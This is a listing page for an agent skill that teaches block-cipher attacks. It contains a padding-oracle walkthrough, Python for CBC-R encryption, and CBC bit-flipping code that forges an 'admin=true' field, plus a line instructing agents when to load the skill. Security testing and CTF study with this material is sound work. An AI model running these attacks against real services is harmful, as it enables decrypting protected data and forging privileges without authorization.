
Symmetric Cipher Attacks
Load deep block-cipher attack scripts and walkthroughs when authorized security testing or CTF work needs padding oracle and related exploits.
Overview
symmetric-cipher-attacks is an agent skill for the Ship phase that provides detailed block-cipher attack implementations and walkthroughs such as padding-oracle exploitation.
Install
npx skills add https://github.com/yaklang/hack-skills --skill symmetric-cipher-attacks
What is this skill?
- Full padding-oracle walkthrough with PKCS#7 padding rules and byte-by-byte CBC decryption logic
- Step-by-step attack internals (intermediate values I[n], modified prev-block oracle queries)
- Companion depth module—assumes main symmetric-cipher SKILL.md already loaded for decision trees
- Edge-case handling for invalid padding patterns (e.g., 0x00 never valid in PKCS#7)
- Structured for exploit scripting rather than casual copy-paste into production apps
- Documents 16-byte block size examples for PKCS#7 padding
- Section 1 provides a full padding-oracle walkthrough with byte-by-byte decryption
Adoption & trust: 1k installs on skills.sh; 980 GitHub stars; 1/3 security scanners passed (skills.sh audits).
What problem does it solve?
You identified a suspected CBC padding oracle and need precise byte-decryption steps instead of a vague "try a PO attack" checklist.
Who is it for?
Authorized pentesters, security-minded indie devs auditing their own ciphertext endpoints, or CTF players with the parent cipher skill already in context.
Skip if: Unauthorized testing of third-party systems, beginners learning baseline TLS setup, or teams that only need "use AES-GCM" guidance without exploit depth.
When should I use this skill?
Load when full attack implementations, step-by-step walkthroughs, and edge-case handling for block cipher exploitation are needed and the main symmetric-cipher SKILL.md is already loaded.
What do I get? / Deliverables
You get scripted padding-oracle internals and PKCS#7 edge cases to validate findings or reproduce lab proofs under authorization.
- Attack procedure aligned to padding-oracle and related block cipher scenarios
- Documented PKCS#7 valid/invalid padding reference for oracle tuning
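A receiving-side counterpart to the PKCS#7 valid/invalid reference, added here as an example and not part of the skill's own code: a strict padding check plus an encrypt-then-MAC receive path that rejects modified ciphertext before decryption, so the caller never learns a padding result. `pkcs7_valid`, `mac_tag`, `open_message`, `RejectedMessage` and the `decrypt_cbc` callable are hypothetical names, and the raw CBC decrypt is assumed to come from the caller's AES library.

```python
import hashlib
import hmac

BLOCK = 16  # block size used in the page's PKCS#7 examples


class RejectedMessage(Exception):
    """One error for every failure, so MAC and padding failures look identical."""


def pkcs7_valid(padded: bytes) -> bool:
    """Strict PKCS#7 check that scans the whole last block (no early exit)."""
    if not padded or len(padded) % BLOCK:
        return False
    n = padded[-1]
    bad = int(n == 0 or n > BLOCK)  # 0x00 and values above the block size
    for i in range(1, BLOCK + 1):
        # Only the last n bytes are padding; each of them must equal n.
        bad |= int(i <= n and padded[-i] != n)
    return bad == 0


def mac_tag(mac_key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    """HMAC-SHA256 over IV || ciphertext (encrypt-then-MAC)."""
    return hmac.new(mac_key, iv + ciphertext, hashlib.sha256).digest()


def open_message(mac_key, iv, ciphertext, tag, decrypt_cbc):
    """Verify the tag first; decrypt and unpad only authentic ciphertext.

    decrypt_cbc is a hypothetical callable (iv, ciphertext) -> padded bytes
    supplied by the caller's AES library.
    """
    if not hmac.compare_digest(mac_tag(mac_key, iv, ciphertext), tag):
        raise RejectedMessage("invalid message")
    padded = decrypt_cbc(iv, ciphertext)
    if not pkcs7_valid(padded):
        raise RejectedMessage("invalid message")
    return padded[:-padded[-1]]
```

The MAC key should be independent of the encryption key; an AEAD mode such as AES-GCM gives the same ordering guarantee without a separate padding step.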
How it compares
Offensive exploit walkthrough module—not a compliance checklist skill and not a general encryption library tutorial.
Common Questions / FAQ
Who is symmetric-cipher-attacks for?
Developers and researchers doing authorized application security work who need implementation-level block cipher attack scripts after reading the main symmetric-cipher skill.
When should I use symmetric-cipher-attacks?
During Ship security reviews when validating custom crypto endpoints, reproducing lab padding-oracle flaws, or extending YakLang hack workflows—not for routine feature development.
Is symmetric-cipher-attacks safe to install?
Treat it as sensitive offensive material; review the Security Audits panel on this Prism page and restrict agent autonomy so exploits run only in scoped, authorized environments.
SKILL.md
SKILL.md - Symmetric Cipher Attacks
# Block Cipher Attacks — Detailed Scripts & Walkthrough

> **AI LOAD INSTRUCTION**: Load this when you need full attack implementations, step-by-step walkthroughs, and edge-case handling for block cipher exploitation. Assumes the main [SKILL.md](./SKILL.md) is already loaded for attack selection and decision trees.

---

## 1. PADDING ORACLE — FULL WALKTHROUGH

### 1.1 PKCS#7 Padding Review

```
Block size: 16 bytes

Data "HELLO" (5 bytes) → padded to 16 bytes:
48 45 4C 4C 4F 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B

Valid padding examples (last byte determines):
  ...01            → 1 byte of padding
  ...02 02         → 2 bytes of padding
  ...03 03 03      → 3 bytes of padding
  ...10 10 10 ...  → 16 bytes (full block of padding)

Invalid:
  ...03 03 04      → last byte says 4, but 3rd-from-end ≠ 04
  ...00            → 0x00 is never valid PKCS#7
```

### 1.2 Attack Internals — Byte-by-Byte Decryption

```
Target: decrypt P[15] (last byte of target block)

CBC decryption internals:
  I[15] = AES_DEC(C_target)[15]   (intermediate value, unknown)
  P[15] = I[15] ⊕ C_prev[15]      (plaintext = intermediate ⊕ prev ciphertext)

Attack for padding 0x01 (valid when last plaintext byte = 0x01):
  We send: C'_prev || C_target
  Where C'_prev[15] = guess
  Server computes: P'[15] = I[15] ⊕ guess
  If P'[15] == 0x01, padding is valid!
  Therefore: I[15] = guess ⊕ 0x01
  And: P[15] = I[15] ⊕ original_C_prev[15]

Next: decrypt P[14] (need padding = 0x02 0x02):
  Set C'_prev[15] = I[15] ⊕ 0x02  (forces P'[15] = 0x02)
  Brute force C'_prev[14] until P'[14] = 0x02

Continue until all 16 bytes recovered.
```

### 1.3 Handling False Positives

```python
def is_real_padding(oracle, modified_block, target_block, byte_pos, block_size):
    """
    When cracking the last byte, padding 0x02 0x02 can give false positive.
    Verify by flipping the penultimate byte — if still valid, it was 0x01.
    """
    if byte_pos != block_size - 1:
        return True
    check = bytearray(modified_block)
    check[byte_pos - 1] ^= 1  # flip adjacent byte
    return oracle(bytes(check) + target_block)
```

### 1.4 Encryption via Padding Oracle (CBC-R)

A padding oracle can also encrypt arbitrary plaintext without the key:

```python
def padding_oracle_encrypt(plaintext, block_size, oracle):
    """Encrypt arbitrary plaintext using padding oracle (CBC-R technique)."""
    # Pad plaintext
    pad_len = block_size - (len(plaintext) % block_size)
    padded = plaintext + bytes([pad_len] * pad_len)
    pt_blocks = [padded[i:i+block_size] for i in range(0, len(padded), block_size)]

    # Start with random last ciphertext block
    import os
    ct_blocks = [os.urandom(block_size)]

    # Work backwards
    for pt_block in reversed(pt_blocks):
        # Use padding oracle to find intermediate values for ct_blocks[0]
        intermediate = decrypt_block_intermediate(ct_blocks[0], block_size, oracle)
        # Previous CT block = intermediate ⊕ desired plaintext
        prev_ct = bytes(i ^ p for i, p in zip(intermediate, pt_block))
        ct_blocks.insert(0, prev_ct)

    return b"".join(ct_blocks)  # first block is IV
```

---

## 2. CBC BIT FLIPPING — ADVANCED SCENARIOS

### 2.1 Multi-Byte Flip

```python
def cbc_multibyte_flip(ciphertext, block_size, changes):
    """
    changes: list of (absolute_position, old_byte, new_byte)
    All changes must be in the SAME target block.
    """
    ct = bytearray(ciphertext)
    for pos, old, new in changes:
        target_block = pos // block_size
        byte_in_block = pos % block_size
        prev_block_pos = (target_block - 1) * block_size + byte_in_block
        ct[prev_block_pos] ^= old ^ new
    return bytes(ct)

# Example: change ";admin=false;" to ";admin=true;x"
changes = [
    (32 + 7, ord('f'), ord('t')),   # f → t
    (32 + 8, ord('a'), ord('r')),   # a → r
    (32 + 9, ord('l'), ord('u')),   # l → u
    (32 + 10, ord('s'), ord('e')),  # s → e
    (32 + 11, ord('e'), ord(';')),  # e → ;
    (32 + 12, ord(';'),